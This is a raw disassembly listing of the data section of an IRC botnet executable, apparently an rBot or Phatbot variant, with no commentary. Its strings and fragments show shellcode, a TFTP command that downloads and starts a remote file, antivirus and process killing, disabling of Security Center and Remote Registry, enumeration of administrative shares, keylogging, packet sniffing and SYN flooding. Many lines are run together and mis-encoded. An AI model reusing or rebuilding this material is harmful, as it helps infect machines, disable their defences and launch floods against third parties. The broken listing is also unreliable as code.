dword_44D520 dd 234032Dh, 6D6F6364h, 2632E32h, 2D03hdword_44D530 dd 6B6E694Ch, 2E746F62h, 6D6F6364h, 612Ehdword_44D540 dd 63737069h, 2A206E61h, 2A2E2A2Eh, 2A2Ehdword_44D550 dd 6B6E694Ch, 2D746F62h, 6E616353h, 612EhaWeBackLooooooo db 'We BaCk LoooooooooooOOOOOOOOOOOOOooo',0 ; DATA XREF: .text:00447C4C�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: .text:00447C48�o
align 4
aPsniffThread db 'psniff thread',0 ; DATA XREF: .text:00447C44�o
align 4
aRbot_psniff db 'rbot.psniff',0 ; DATA XREF: .text:00447C40�o
dword_44D5A8 dd 0F254C481h, 0E8FCFFFFh, 46hoff_44D5B4 dd offset byte_4E5341 ; DATA XREF: .text:00447C38�o
dword_44D5B8 dd 0D959516Ah, 2474D9EEh, 0F4haNetapi4444bind db 'Netapi4444Bind',0 ; DATA XREF: .text:00447C30�o
align 4
a3GsUT db '3Ƀé°ÙîÙt',0 ; DATA XREF: .text:00447C2C�o
align 10h
off_44D5E0 dd offset byte_4D5953 ; DATA XREF: .text:00447C28�o
dword_44D5E4 dd 0E983C933h, 0D9EED9AFh, 74haC101 db 'C101',0 ; DATA XREF: .text:00447C20�o
align 4
loc_44D5F8: ; DATA XREF: .text:00447C1C�o
jmp short loc_44D5FC
; ---------------------------------------------------------------------------
loc_44D5FA: ; CODE XREF: .text:loc_44D5FC�p
jmp short near ptr byte_44D601
; ---------------------------------------------------------------------------
loc_44D5FC: ; CODE XREF: .text:loc_44D5F8�j
call loc_44D5FA
; ---------------------------------------------------------------------------
byte_44D601 db 3 dup(0) ; CODE XREF: .text:loc_44D5FA�j
dword_44D604 dd 412E5450h, 0 dword_44D60C dd 4143535Bh, 203A5D4Eh, 0dword_44D618 dd 53207852h, 6E6163hdword_44D620 dd 0D959506Ah, 2474D9EEh, 0F4hdword_44D62C dd 5D42525Bh, 53746F42h, 6C6C6568h, 0dword_44D63C dd 34D9E1D9h, 58585824h, 58hdword_44D648 dd 6F626159h, 612E74h; ---------------------------------------------------------------------------
loc_44D650: ; DATA XREF: .text:00447BFC�o
jmp short near ptr aTftp+6
; ---------------------------------------------------------------------------
dw 758Bh
dd 35748B3Ch, 78h
dword_44D65C dd 47323357h, 53206E65h, 43haCmdCTftpISGetS db 'cmd /c tftp -i %s GET %s &start %s &exit',0 ; DATA XREF: .text:00447BF4�o
align 4
aTftpget_b db 'TFTPGet.b',0 ; DATA XREF: .text:00447BF0�o
align 10h
aTftp db '[TFTP]',0 ; CODE XREF: .text:loc_44D650�j
; DATA XREF: .text:00447BEC�o
align 4
aRxTftp db 'Rx TFTP',0 ; DATA XREF: .text:00447BE8�o
aTftpISGetSS db 'tftp -i %s get %s &%s',0Ah,0 ; DATA XREF: .text:00447BE4�o
align 4
aTftpget_a db 'TFTPGet.a',0 ; DATA XREF: .text:00447BE0�o
align 4
a220BotServerWi db '220 Bot Server (Win32)',0Dh,0Ah,0 ; DATA XREF: .text:00447BDC�o
align 10h
aPhatbot db 'PhatBot',0 ; DATA XREF: .text:00447BD8�o
a220WelcomeToBo db '220 "Welcome to Bot FTP service."',0Dh,0Ah,0
; DATA XREF: .text:00447BD4�o
aAgobot db 'AgoBot',0 ; DATA XREF: .text:00447BD0�o
align 4
aStnyftpd0wnsJ0 db 'StnyFtpd 0wns j00',0 ; DATA XREF: .text:00447BCC�o
align 4
aStnyftpd db 'StnyFtpd',0 ; DATA XREF: .text:00447BC8�o
align 4
aMain_0 db '-MAiN-',0 ; DATA XREF: .text:00447BC4�o
align 4
aRep08Main db 'Rep08 Main',0 ; DATA XREF: .text:00447BC0�o
align 4
a220ReptileWelc db '220 Reptile welcomes you..',0Dh,0Ah,0 ; DATA XREF: .text:00447BBC�o
align 4
aRep08Ftpd db 'Rep08 FTPd',0 ; DATA XREF: .text:00447BB8�o
align 4
aReptileWelcome db 'Reptile welcomes you...',0 ; DATA XREF: .text:00447BB4�o
aRepFtpd db 'Rep FTPd',0 ; DATA XREF: .text:00447BB0�o
align 4
loc_44D7A8: ; DATA XREF: .text:00447BAC�o
jmp short near ptr word_44D7BA
; ---------------------------------------------------------------------------
dw 4B5Bh
dd 0B966C933h, 25h
dword_44D7B4 dd 4C205852h db 53h, 0
word_44D7BA dw 0 ; CODE XREF: .text:loc_44D7A8�j
dword_44D7BC dd 5054465Bh, 203A5Dhdword_44D7C4 dd 46207852h, 7074h; ---------------------------------------------------------------------------
loc_44D7CC: ; DATA XREF: .text:00447B9C�o
jmp short loc_44D7DE
; ---------------------------------------------------------------------------
dw 4A5Ah
dd 0B966C933h, 7Dh
dword_44D7D8 dd 20706552h ; ---------------------------------------------------------------------------
push ebx
inc ebx
loc_44D7DE: ; CODE XREF: .text:loc_44D7CC�j
xor al, [eax]
loc_44D7E0: ; DATA XREF: .text:00447B94�o
jmp short near ptr word_44D7F2
; ---------------------------------------------------------------------------
dw 4A5Ah
dd 0B966C933h, 66h
dword_44D7EC dd 53205852h db 43h, 32h
word_44D7F2 dw 0 ; CODE XREF: .text:loc_44D7E0�j
dword_44D7F4 dd 364C033h, 0C783040h, 8Bhdword_44D800 dd 53205852h, 3143hdword_44D808 dd 43524902h, 203A3A20h, 2dword_44D814 dd 43207852h, 726F6C6Fh, 2E435249h, 62hdword_44D824 dd 49414D02h, 3A3A204Eh, 220hdword_44D830 dd 43207852h, 726F6C6Fh, 622Ehdword_44D83C dd 63533A3Ah, 3A3A6E61h, 0dword_44D848 dd 43207852h, 726F6C6Fh, 6E616353h, 0dword_44D858 dd 614D3A3Ah, 3A3A6E69h, 0dword_44D864 dd 43207852h, 726F6C6Fh, 0dword_44D870 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: .text:00447B64�o
dd 2BBBB02h, 73552020h, 7265h
dword_44D890 dd 5A4E7852h, 632E4Dha_n_z_m_Irc_p_l db '.n.z.m. (irc.p.l.g) .»». ',0 ; DATA XREF: .text:00447B5C�o
align 4
aRxnzm_b db 'RxNZM.b',0 ; DATA XREF: .text:00447B58�o
dword_44D8BC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: .text:00447B54�o
dd 2BBBB02h, 20h
aRxnzm db 'RxNZM',0 ; DATA XREF: .text:00447B50�o
align 10h
dword_44D8E0 dd 234032Dh, 6E69616Dh, 202D0302h, 0dword_44D8F0 dd 4C2D7852h, 2D6B6E69h, 2E414950h, 63hdword_44D900 dd 234032Dh, 6E616373h, 202D0302h, 0dword_44D910 dd 4C2D7852h, 2D6B6E69h, 414950hdword_44D91C dd 5446545Bh, 3A5D4450h, 20hdword_44D928 dd 54207852h, 64505446h, 0dword_44D934 dd 5446545Bh, 203A5D50h, 0dword_44D940 dd 54207852h, 2E505446h, 62hdword_44D94C dd 50544654h, 2F2Fhdword_44D954 dd 53207852h, 6873616Ch, 7446542Dh, 70hdword_44D964 dd 4E414353h, 2F2Fhdword_44D96C dd 53207852h, 6873616Ch, 6163532Dh, 6Ehdword_44D97C dd 4E49414Dh, 2F2Fhdword_44D984 dd 53207852h, 6873616Ch, 0dword_44D990 dd 4F57445Bh, 414F4C4Eh, 203A5D44h, 0dword_44D9A0 dd 44207852h, 6C6E776Fh, 64616Fhdword_44D9AC dd 5054465Bh, 203A5D44h, 0dword_44D9B8 dd 46207852h, 447074hdword_44D9C0 dd 59454B5Bh, 5D474F4Ch, 203Ahdword_44D9CC dd 4B207852h, 6F4C7965h, 67hdword_44D9D8 dd 234032Dh, 2637269h, 2D03haPiabot db 'PiABot',0 ; DATA XREF: .text:00447AF8�o
align 4
aIrc db 'IRC//',0 ; DATA XREF: .text:00447AF4�o
align 4
aRxIrc_c db 'Rx IRC.c',0 ; DATA XREF: .text:00447AF0�o
align 10h
aIrc_0 db '[IRC]: ',0 ; DATA XREF: .text:off_447AEC�o
aRxIrc db 'Rx IRC',0 ; DATA XREF: .text:00447AE8�o
align 10h
aSFoundStringSI db '%s Found string "%s" in "%s" File "%s"',0 ; DATA XREF: sub_41EE89+D1�o
align 4
aSTerminatedAnd db '%s Terminated and deleted %s',0 ; DATA XREF: sub_41EFEF+BC�o
align 4
aSBkillShutdown db '%s bkill shutdown for wride.',0 ; DATA XREF: sub_41F0F5+3E4�o
; sub_41F0F5+41D�o
align 4
aSRunningAvscan db '%s Running AVScan on %s',0 ; DATA XREF: sub_41F0F5+312�o
aSMatchedAndKil db '%s Matched and killing %s',0 ; DATA XREF: sub_41F0F5+29D�o
align 4
aSKillingS db '%s Killing %s',0 ; DATA XREF: sub_41F0F5+228�o
align 4
asc_44DABC: ; DATA XREF: sub_41F0F5+56�o
; sub_423919+A4�o ...
unicode 0, <\>,0
aSProcsSSTotalS db '%s Procs %s: "%s", Total %s Time: %s.',0 ; DATA XREF: sub_41F533+2FB�o
align 4
aSCreatedProcSP db '%s Created proc: "%s", PID: <%d>',0 ; DATA XREF: sub_41F533+1CA�o
align 4
aSSToCreatePr_0 db '%s %s to create proc: "%s", %s: <%d>',0 ; DATA XREF: sub_41F533+16F�o
; sub_41F533+19D�o
align 4
aSCouldnTPars_0 db '%s Couldn',27h,'t parse path, %s <%d>',0 ; DATA XREF: sub_41F533+98�o
; sub_41F533+BE�o
aSPidIKilledAnd db '%s PID "%i" killed and deleted',0 ; DATA XREF: sub_41F876+3D8�o
align 4
aSFailedToKillA db '%s Failed to kill and erase proc',0 ; DATA XREF: sub_41F876+37B�o
align 4
aSFailedToKillP db '%s Failed to kill proc',0 ; DATA XREF: sub_41F876:loc_41FB1E�o
align 10h
aSPidIKilled db '%s PID "%i" killed',0 ; DATA XREF: sub_41F876+251�o
align 4
aSProSKilledTot db '%s Pro "%s" killed,total: <%s>',0 ; DATA XREF: sub_41F876+1F9�o
align 4
aSUnableToListP db '%s Unable to list procs, %s: <%d>',0 ; DATA XREF: sub_41F876+185�o
; sub_41F876+1AA�o
align 4
aSEndOfList db '%s End of list',0 ; DATA XREF: sub_41F876+14D�o
align 4
a6d10sS db ' %-6d- %-10s- "%s"',0 ; DATA XREF: sub_41F876+106�o
align 4
aK db ' K',0 ; DATA XREF: sub_41F876+E9�o
align 10h
aPidAMemoryUsag db ' PID - Memory Usage - Process',0 ; DATA XREF: sub_41F876+9D�o
aSProcsList db '%s Procs List:',0 ; DATA XREF: sub_41F876+82�o
align 10h
aSS_4 db '%s / %s',0Ah,0 ; DATA XREF: sub_41FC58+17A�o
align 4
aSD_2 db '%s: <%d>',0 ; DATA XREF: sub_41FC58+11D�o
align 4
aUnknown db 'unknown',0 ; DATA XREF: sub_41FE3F+E0�o
; sub_427F60+3B�o
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_41FE3F+5C�o
; sub_42003C+4E�o
align 4
aSPingRequestFr db '%s Ping request from: %s!%s@%s',0 ; DATA XREF: sub_42045F+62F�o
align 4
dword_44DCB4 dd 4E495001h, 73252047h, 0dword_44DCC0 dd 4E495001h, 47haTransferComple db 'Transfer complete from IP: %s, File: %s (%s bytes).',0
; DATA XREF: sub_42045F+582�o
aSSOpeningFileF db '%s %s opening file for writing.',0 ; DATA XREF: sub_42045F+441�o
off_44DD1C dd offset byte_622B61 ; DATA XREF: sub_42045F+423�o
aSSUnableToWrit db '%s %s unable to write file to disk.',0 ; DATA XREF: sub_42045F+40F�o
aSend_0 db 'SEND',0 ; DATA XREF: sub_42045F+39C�o
align 4
aSDccRequestFro db '%s DCC request from: %s!%s@%s',0 ; DATA XREF: sub_42045F+38C�o
align 4
dword_44DD6C dd 43434401h, 0 aSVersionReques db '%s Version request from: %s!%s@%s',0 ; DATA XREF: sub_42045F+346�o
align 4
dword_44DD98 dd 52455601h, 4E4F4953h, 1732520h, 0dword_44DDA8 dd 52455601h, 4E4F4953h, 1aSSSS@SPassTrie db '%s %s [%s!%s@%s] (Pass Tried -> %s)',0 ; DATA XREF: sub_42045F+212�o
aSS@S db '%s!%s@%s',0 ; DATA XREF: sub_42045F+1A7�o
align 4
aSSSS@SSentPmS db '%s %s %s!%s@%s (Sent PM -> "%s")',0 ; DATA XREF: sub_42045F+154�o
align 4
asc_44DE08: ; DATA XREF: sub_42045F+28�o
; sub_420B3B+8C�o
unicode 0, <+>,0
aTopic db 'topic',0 ; DATA XREF: sub_420B3B+10B�o
align 4
a433 db '433',0 ; DATA XREF: sub_420D91+BA�o
; sub_4263D5:loc_426450�o
a422 db '422',0 ; DATA XREF: sub_420D91+A9�o
a376 db '376',0 ; DATA XREF: sub_420D91+9C�o
a005 db '005',0 ; DATA XREF: sub_420D91+91�o
a366 db '366',0 ; DATA XREF: sub_420D91+7D�o
a332 db '332',0 ; DATA XREF: sub_420D91+6C�o
a302 db '302',0 ; DATA XREF: sub_420D91+5F�o
off_44DE30 dd offset dword_554B48 ; DATA XREF: sub_420E5B+7D�o
aHkey_users db 'HKEY_USERS',0 ; DATA XREF: sub_420E5B+71�o
align 10h
aHkcc db 'HKCC',0 ; DATA XREF: sub_420E5B+65�o
align 4
aHkey_current_c db 'HKEY_CURRENT_CONFIG',0 ; DATA XREF: sub_420E5B+59�o
aHkcr db 'HKCR',0 ; DATA XREF: sub_420E5B+4D�o
align 4
aHkey_classes_r db 'HKEY_CLASSES_ROOT',0 ; DATA XREF: sub_420E5B+41�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_420E5B+35�o
; sub_42184C+9B�o ...
align 10h
aHkey_current_u db 'HKEY_CURRENT_USER',0 ; DATA XREF: sub_420E5B+29�o
align 4
aHklm db 'HKLM',0 ; DATA XREF: sub_420E5B+1D�o
; sub_42184C+94�o ...
align 4
aHkey_local_mac db 'HKEY_LOCAL_MACHINE',0 ; DATA XREF: sub_420E5B+D�o
align 10h
aReg_dword db 'REG_DWORD',0 ; DATA XREF: sub_420F07:loc_420F38�o
align 4
aReg_multi_sz db 'REG_MULTI_SZ',0 ; DATA XREF: sub_420F07:loc_420F5A�o
align 4
aReg_expand_sz db 'REG_EXPAND_SZ',0 ; DATA XREF: sub_420F07:loc_420F26�o
align 4
aReg_sz db 'REG_SZ',0 ; DATA XREF: sub_420F07:loc_420F2C�o
align 4
aReg_dword_big_ db 'REG_DWORD_BIG_ENDIAN',0 ; DATA XREF: sub_420F07:loc_420F66�o
align 4
aReg_link db 'REG_LINK',0 ; DATA XREF: sub_420F07:loc_420F60�o
align 4
aReg_qword db 'REG_QWORD',0 ; DATA XREF: sub_420F07:loc_420F54�o
align 4
aUnknown_0 db 'UNKNOWN',0 ; DATA XREF: sub_420F07:loc_420F4E�o
aReg_none db 'REG_NONE',0 ; DATA XREF: sub_420F07:loc_420F32�o
align 4
aReg_binary db 'REG_BINARY',0 ; DATA XREF: sub_420F07+19�o
align 4
a_2dSSS db '(%.2d) %s\%s (%s)',0 ; DATA XREF: sub_421126+169�o
align 4
aDefault db '(Default)',0 ; DATA XREF: sub_421126+148�o
align 4
a_2dSS db '(%.2d) %s\%s',0 ; DATA XREF: sub_421126+C0�o
align 8
off_44DF68 dd offset aTlntsvr ; DATA XREF: sub_421E93+2D�r
; "Tlntsvr"
dd offset aRemoteregistry ; "RemoteRegistry"
dd offset aMessenger ; "Messenger"
dd offset aWscsvc ; "wscsvc"
off_44DF78 dd offset aTelnet ; DATA XREF: sub_421E93+6E�r
; sub_421E93+AB�r ...
; "Telnet"
dd offset aRemoteRegistry ; "Remote Registry"
dd offset aMessenger ; "Messenger"
dd offset aSecurityCenter ; "Security Center"
dword_44DF88 dd 80000002h ; sub_42184C:loc_4218D6�r ...
dword_44DF8C dd 54535953h ; sub_42184C+14E�r
aEmCurrentcontr db 'EM\CurrentControlSet\Control\Lsa',0
align 4
dd 35h dup(0)
db 3 dup(0)
dword_44E08B dd 74736572h ; sub_42184C:loc_421992�r
aRictanonymous db 'rictanonymous',0
align 10h
dd 3Bh dup(0)
dword_44E18C dd 4 dword_44E190 dd 1 ; sub_42184C+7C�r ...
dword_44E194 dd 0 ; sub_42184C:loc_4218D0�r ...
dword_44E198 dd 0 ; sub_42184C+18B�r ...
dd 3Eh dup(0)
db 3 dup(0)
dword_44E297 dd 0 ; sub_42184C+193�r ...
align 4
dd 3Fh dup(0)
dd 80000002h, 54464F53h, 45524157h, 6C6F505Ch, 65696369h
dd 694D5C73h, 736F7263h, 5C74666Fh, 646E6957h, 5C73776Fh
dd 646E6957h, 5573776Fh, 74616470h, 65h, 32h dup(0)
dd 44000000h, 746F4E6Fh, 6F6C6C41h, 53505877h, 3250h, 3Ch dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 74666F53h, 65726177h, 63694D5Ch, 6F736F72h
dd 4F5C7466h, 454Ch, 39h dup(0)
dd 45000000h, 6C62616Eh, 4F434465h, 4Dh, 3Dh dup(0)
dd 1, 2 dup(0)
dd 4Eh, 3Eh dup(0)
dd 59000000h, 40h dup(0)
off_44EBB8 dd offset off_44EF58 ; DATA XREF: sub_421B16+85�r
; sub_421B16:loc_421BD3�r ...
dword_44EBBC dd 0 dd offset off_44EF48
align 8
dd offset off_44EF38
align 10h
dd offset aC_1 ; "C$"
dd offset aC_2 ; "C:\\"
dd offset aD_1 ; "D$"
dd offset aD_2 ; "D:\\"
dd offset aE_2 ; "E$"
dd offset aE_3 ; "E:\\"
dd offset aF_0 ; "F$"
dd offset aF_1 ; "F:\\"
dd offset aG_0 ; "G$"
dd offset aG_1 ; "G:\\"
dd offset asc_44EEE0 ; "H$"
dd offset asc_44EED8 ; "H:\\"
dd offset aI_2 ; "I$"
dd offset aI_3 ; "I:\\"
dd offset aJ_0 ; "J$"
dd offset aJ_1 ; "J:\\"
dd offset aJ_0 ; "J$"
dd offset aJ_1 ; "J:\\"
dd offset aK_1 ; "K$"
dd offset aK_2 ; "K:\\"
dd offset asc_44EEA0 ; "L$"
dd offset asc_44EE98 ; "L:\\"
dd offset aM_5 ; "M$"
dd offset aM_6 ; "M:\\"
dd offset aN_1 ; "N$"
dd offset aN_2 ; "N:\\"
dd offset aO_0 ; "O$"
dd offset aO_1 ; "O:\\"
dd offset aP_4 ; "P$"
dd offset aP_5 ; "P:\\"
dd offset aQ_1 ; "Q$"
dd offset aQ_2 ; "Q:\\"
dd offset aR_0 ; "R$"
dd offset aR_1 ; "R:\\"
dd offset aS_9 ; "S$"
dd offset aS_8 ; "S:\\"
dd offset aT_0 ; "T$"
dd offset aT_1 ; "T:\\"
dd offset aU_2 ; "U$"
dd offset aU_1 ; "U:\\"
dd offset aV_0 ; "V$"
dd offset aV_1 ; "V:\\"
dd offset aW_0 ; "W$"
dd offset aW_1 ; "W:\\"
dd offset asc_44EDE0 ; "X$"
dd offset asc_44EDD8 ; "X:\\"
dd offset aY_1 ; "Y$"
dd offset aY_2 ; "Y:\\"
dd offset aZ_2 ; "Z$"
dd offset aZ_3 ; "Z:\\"
dd offset off_44EF38
dd offset off_44EDA4
dd offset off_44EF48
dd offset off_44ED94
dd offset off_44EF58
dd offset off_44ED88
dd offset off_44EF58
dd offset off_44ED7C
dd offset off_44EF58
dd offset off_44ED68
dd offset off_44EF58
dd offset aWkssvc ; "wkssvc\\"
dd offset off_44EF58
dd offset aSrvsvc ; "srvsvc\\"
dd offset off_44ED34
dd offset off_44ED20
dd offset off_44EF58
dd offset aTsclient ; "tsclient\\"
dd offset off_44EF58
dd offset aTsweb ; "tsweb\\"
dd offset off_44EF58
dd offset off_44ECF0
off_44ECF0 dd offset dword_50004C ; DATA XREF: .text:0044ECEC�o
dd offset dword_520054
dd 5Ch
aTsweb: ; DATA XREF: .text:0044ECE4�o
unicode 0, <tsweb\>,0
align 4
aTsclient: ; DATA XREF: .text:0044ECDC�o
unicode 0, <tsclient\>,0
off_44ED20 dd offset word_65006E ; DATA XREF: .text:0044ECD4�o
aTlogon:
unicode 0, <tlogon\>,0
off_44ED34 dd offset off_45004E ; DATA XREF: .text:0044ECD0�o
dd offset dword_4C0054
dd offset byte_47004F
dd offset byte_4E004F
dd 24h
aSrvsvc: ; DATA XREF: .text:0044ECCC�o
unicode 0, <srvsvc\>,0
aWkssvc: ; DATA XREF: .text:0044ECC4�o
unicode 0, <wkssvc\>,0
off_44ED68 dd offset word_520042 ; DATA XREF: .text:0044ECBC�o
dd offset byte_57004F
dd offset byte_450053
dd offset word_5C0052
dd 0
off_44ED7C dd offset dword_490050 ; DATA XREF: .text:0044ECB4�o
dd offset off_45004E+2
dd 5Ch
off_44ED88 dd offset byte_500049 ; DATA XREF: .text:0044ECAC�o
dd offset byte_5C0043
dd 0
off_44ED94 dd offset aRy6iq0udbphLlD+0Dh ; DATA XREF: .text:0044ECA4�o
dd offset byte_49004D
dd offset word_5C004E
dd 0
off_44EDA4 dd offset dword_520050 ; DATA XREF: .text:0044EC9C�o
dd offset byte_4E0049
dd offset dword_450054
dd offset word_5C0052
align 8
aZ_3: ; DATA XREF: .text:0044EC94�o
unicode 0, <Z:\>,0
aZ_2: ; DATA XREF: .text:0044EC90�o
unicode 0, <Z$>,0
align 4
aY_2: ; DATA XREF: .text:0044EC8C�o
unicode 0, <Y:\>,0
aY_1: ; DATA XREF: .text:0044EC88�o
unicode 0, <Y$>,0
align 4
asc_44EDD8: ; DATA XREF: .text:0044EC84�o
unicode 0, <X:\>,0
asc_44EDE0: ; DATA XREF: .text:0044EC80�o
unicode 0, <X$>,0
align 4
aW_1: ; DATA XREF: .text:0044EC7C�o
unicode 0, <W:\>,0
aW_0: ; DATA XREF: .text:0044EC78�o
unicode 0, <W$>,0
align 4
aV_1: ; DATA XREF: .text:0044EC74�o
unicode 0, <V:\>,0
aV_0: ; DATA XREF: .text:0044EC70�o
unicode 0, <V$>,0
align 4
aU_1: ; DATA XREF: .text:0044EC6C�o
unicode 0, <U:\>,0
aU_2: ; DATA XREF: .text:0044EC68�o
unicode 0, <U$>,0
align 4
aT_1: ; DATA XREF: .text:0044EC64�o
unicode 0, <T:\>,0
aT_0: ; DATA XREF: .text:0044EC60�o
unicode 0, <T$>,0
align 4
aS_8: ; DATA XREF: .text:0044EC5C�o
unicode 0, <S:\>,0
aS_9: ; DATA XREF: .text:0044EC58�o
unicode 0, <S$>,0
align 4
aR_1: ; DATA XREF: .text:0044EC54�o
unicode 0, <R:\>,0
aR_0: ; DATA XREF: .text:0044EC50�o
unicode 0, <R$>,0
align 4
aQ_2: ; DATA XREF: .text:0044EC4C�o
unicode 0, <Q:\>,0
aQ_1: ; DATA XREF: .text:0044EC48�o
unicode 0, <Q$>,0
align 4
aP_5: ; DATA XREF: .text:0044EC44�o
unicode 0, <P:\>,0
aP_4: ; DATA XREF: .text:0044EC40�o
unicode 0, <P$>,0
align 4
aO_1: ; DATA XREF: .text:0044EC3C�o
unicode 0, <O:\>,0
aO_0: ; DATA XREF: .text:0044EC38�o
unicode 0, <O$>,0
align 4
aN_2: ; DATA XREF: .text:0044EC34�o
unicode 0, <N:\>,0
aN_1: ; DATA XREF: .text:0044EC30�o
unicode 0, <N$>,0
align 4
aM_6: ; DATA XREF: .text:0044EC2C�o
unicode 0, <M:\>,0
aM_5: ; DATA XREF: .text:0044EC28�o
unicode 0, <M$>,0
align 4
asc_44EE98: ; DATA XREF: .text:0044EC24�o
unicode 0, <L:\>,0
asc_44EEA0: ; DATA XREF: .text:0044EC20�o
unicode 0, <L$>,0
align 4
aK_2: ; DATA XREF: .text:0044EC1C�o
unicode 0, <K:\>,0
aK_1: ; DATA XREF: .text:0044EC18�o
unicode 0, <K$>,0
align 4
aJ_1: ; DATA XREF: .text:0044EC0C�o
; .text:0044EC14�o
unicode 0, <J:\>,0
aJ_0: ; DATA XREF: .text:0044EC08�o
; .text:0044EC10�o
unicode 0, <J$>,0
align 4
aI_3: ; DATA XREF: .text:0044EC04�o
unicode 0, <I:\>,0
aI_2: ; DATA XREF: .text:0044EC00�o
unicode 0, <I$>,0
align 4
asc_44EED8: ; DATA XREF: .text:0044EBFC�o
unicode 0, <H:\>,0
asc_44EEE0: ; DATA XREF: .text:0044EBF8�o
unicode 0, <H$>,0
align 4
aG_1: ; DATA XREF: .text:0044EBF4�o
unicode 0, <G:\>,0
aG_0: ; DATA XREF: .text:0044EBF0�o
unicode 0, <G$>,0
align 4
aF_1: ; DATA XREF: .text:0044EBEC�o
unicode 0, <F:\>,0
aF_0: ; DATA XREF: .text:0044EBE8�o
unicode 0, <F$>,0
align 4
aE_3: ; DATA XREF: .text:0044EBE4�o
unicode 0, <E:\>,0
aE_2: ; DATA XREF: .text:0044EBE0�o
unicode 0, <E$>,0
align 4
aD_2: ; DATA XREF: .text:0044EBDC�o
unicode 0, <D:\>,0
aD_1: ; DATA XREF: .text:0044EBD8�o
unicode 0, <D$>,0
align 4
aC_2: ; DATA XREF: .text:0044EBD4�o
unicode 0, <C:\>,0
aC_1: ; DATA XREF: .text:0044EBD0�o
unicode 0, <C$>,0
align 4
off_44EF38 dd offset dword_520050 ; DATA XREF: .text:0044EBC8�o
; .text:0044EC98�o
dd offset byte_4E0049
aT_2:
unicode 0, <T$>,0
align 4
off_44EF48 dd offset aRy6iq0udbphLlD+0Dh ; DATA XREF: .text:0044EBC0�o
; .text:0044ECA0�o
dd offset byte_49004D
aN_3:
unicode 0, <N$>,0
align 4
off_44EF58 dd offset byte_500049 ; DATA XREF: .text:off_44EBB8�o
; .text:0044ECA8�o ...
aC_3:
unicode 0, <C$>,0
align 4
aSecurityCenter db 'Security Center',0 ; DATA XREF: .text:0044DF84�o
aRemoteRegistry db 'Remote Registry',0 ; DATA XREF: .text:0044DF7C�o
aTelnet db 'Telnet',0 ; DATA XREF: .text:off_44DF78�o
align 4
aWscsvc db 'wscsvc',0 ; DATA XREF: .text:0044DF74�o
align 4
aMessenger db 'Messenger',0 ; DATA XREF: .text:0044DF70�o
; .text:0044DF80�o
align 10h
aRemoteregistry db 'RemoteRegistry',0 ; DATA XREF: .text:0044DF6C�o
align 10h
aTlntsvr db 'Tlntsvr',0 ; DATA XREF: .text:off_44DF68�o
aSRegistryS_2d_ db '%s Registry %s, (%.2d/%.2d)',0 ; DATA XREF: sub_42184C+2AE�o
aSFailedToSRegi db '%s Failed to %s Registry, (%.2d/%.2d)',0 ; DATA XREF: sub_42184C+275�o
align 4
aSecured db 'Secured',0 ; DATA XREF: sub_42184C+25E�o
aSFailedToSet_0 db '%s Failed to set "%s\%s\%s" to "%s".',0 ; DATA XREF: sub_42184C+21D�o
align 4
aSSetSSSToS_ db '%s Set "%s\%s\%s" to "%s".',0 ; DATA XREF: sub_42184C+1C4�o
align 4
aSFailedToSetSS db '%s Failed to set "%s\%s\%s" to "%d".',0 ; DATA XREF: sub_42184C+11F�o
align 10h
aSSetSSSToD_ db '%s Set "%s\%s\%s" to "%d".',0 ; DATA XREF: sub_42184C+B5�o
align 4
aSTotalShares_0 db '%s Total shares [%s: %d]',0 ; DATA XREF: sub_421B16+365�o
align 4
aTotalSharesS_0 db ' Total shares [%s: %d]',0 ; DATA XREF: sub_421B16+343�o
align 10h
aSNoSharesS_ db '%s No shares %s.',0 ; DATA XREF: sub_421B16:loc_421E40�o
align 4
aUnloading db 'Unloading',0 ; DATA XREF: sub_421B16+289�o
align 10h
aCreated db 'created',0 ; DATA XREF: sub_421B16+23E�o
aSTotalSharesSD db '%s Total shares %s: [%d]',0 ; DATA XREF: sub_421B16+231�o
align 4
aTotalSharesSD db ' Total shares: [%s: %d]',0 ; DATA XREF: sub_421B16+1CF�o
off_44F11C dd offset dword_532520 ; DATA XREF: sub_421B16+C9�o
; sub_421B16+157�o ...
dword_44F120 dd 2Ch ; sub_421B16+142�o ...
dword_44F124 dd 53207325h, 65726168h, 73252073h, 3Ah ; sub_421B16+256�o
aErased db 'erased',0 ; DATA XREF: sub_421B16+34�o
; sub_421B16:loc_421CCE�o ...
align 4
aSTotalServices db '%s Total services stopped: %d',0 ; DATA XREF: sub_421E93+15E�o
align 4
aSNoServicesSto db '%s No services stopped.',0 ; DATA XREF: sub_421E93+136�o
aSTheSServiceWa db '%s The %s service was not started.',0 ; DATA XREF: sub_421E93+F0�o
align 4
aSSServiceStopp db '%s %s service stopped.',0 ; DATA XREF: sub_421E93+B2�o
align 10h
aSTheSServiceDo db '%s The %s service does not exist.',0 ; DATA XREF: sub_421E93+75�o
align 4
aSystemShutting db 'System shutting down.',0 ; DATA XREF: sub_422009+E8�o
align 4
aS_4 db '"%s"',0 ; DATA XREF: sub_4221E4+14�o
align 4
aSErrorD db '%s Error: %d',0 ; DATA XREF: sub_4225E4+2EB�o
align 4
aSCanTSyn_Error db '%s Can',27h,'t Syn. Error: %d',0 ; DATA XREF: sub_4225E4+95�o
; sub_4225E4+D9�o ...
aSS@IkbS db '%s %s @ (%iKB/s)',0 ; DATA XREF: sub_4229B7+60�o
align 10h
aSCanTUseRawOpt db '%s Can',27h,'t use raw opt: %d',0 ; DATA XREF: sub_422B50+120�o
align 10h
aSErrorSendingP db '%s Error sending packets to IP: %s. Packets sent: %d. Error: <%d>'
; DATA XREF: sub_422E10+611�o
db '.',0
align 4
aSSWithSToIpS_S db '%s %s with %s to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).',0
; DATA XREF: sub_422E10+589�o
align 4
aSInvalidTarget db '%s Invalid target IP.',0 ; DATA XREF: sub_422E10+1D4�o
align 4
aSSD__0 db '%s %s <%d>.',0 ; DATA XREF: sub_422E10+8B�o
; sub_422E10+138�o
aSSS_3 db '%s (%s) %s',0 ; DATA XREF: sub_423654+81�o
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_423719+61�o
align 4
aSThreadsList db '%s Threads List:',0 ; DATA XREF: sub_423719+37�o
align 10h
off_44F320 dd offset aQ ; DATA XREF: sub_426761+69�r
; "q"
dd offset dword_450064
